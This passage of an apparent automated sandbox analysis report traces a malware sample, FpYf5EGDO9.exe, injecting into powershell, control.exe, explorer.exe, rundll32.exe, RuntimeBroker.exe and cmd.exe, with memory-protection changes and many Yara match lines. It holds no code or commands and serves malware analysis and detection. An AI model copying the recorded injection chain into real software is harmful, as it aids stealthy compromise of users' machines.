Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0 |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 940000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2AE0000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 93C000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: D70000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 1B888A50000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057A000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E30000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290AE000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: D2F18CF000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27740170000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 35D0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0 |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp | Binary or memory string: Program Manager |
Source: explorer.exe, 00000019.00000000.485521161.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr |
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp | Binary or memory string: Progman |
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp | Binary or memory string: Progmanlock |
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh |
Source: Yara match | File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
